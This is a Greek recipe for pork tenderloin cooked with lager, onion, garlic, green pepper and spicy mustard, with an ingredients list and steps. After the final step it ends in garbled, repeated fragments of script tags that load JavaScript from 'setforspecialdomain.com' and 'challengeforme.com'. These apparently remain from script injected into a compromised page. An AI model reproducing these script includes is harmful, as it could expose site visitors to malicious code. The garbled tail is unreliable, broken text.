Υπέροχο, απλό και εντυπωσιακό! Μεθυσμένο ψαρονέφρι με πικάντικη μουστάρδα!

Το καλύτερο κομμάτι από το χοιρινό κρέας με όμορφα αρώματα και την πικάντικη μουστάρδα να δίνει εντάσεις.

Υλικά

800 ψαρονέφρι
200 ml μπύρα ξανθιά
1 ψιλοκομμένο κρεμμύδι ξερό
1 σκελίδα σκόρδο ψιλοκομμένο
1 πιπεριά πράσινη ψιλοκομμένη
Αλάτι, πιπέρι
300 γραμμάρια μουστάρδα
100 γραμμάρια μαργαρίνη

Εκτέλεση

Σε ένα τηγάνι ρίχνουμε τη μαργαρίνη και τη ζεσταίνουμε καλά. Στη συνέχεια,τοποθετούμε τα χοιρινά φιλετάκια και τα αλατοπιπερώνουμε.
Κατόπιν, σοτάρουμε τα χοιρινά φιλετάκια και προσθέτουμε την πιπεριά, το κρεμμύδι και το σκόρδο.

Σβήνουμε με την μπύρα, αφήνουμε να τραβηχτούν λίγο τα υγρά και προσθέτουμε τη μουστάρδα.
Εν τω μεταξύ, εάν η σάλτσα σφίξει, προσθέστε λίγη μπύρα ακόμη και αφήνουμε να μαγειρευτούν για 20 λεπτά. Όταν μαγειρευτούν, γαρνίρουμε με ψιλοκομμένο μαϊντανό.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’> challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >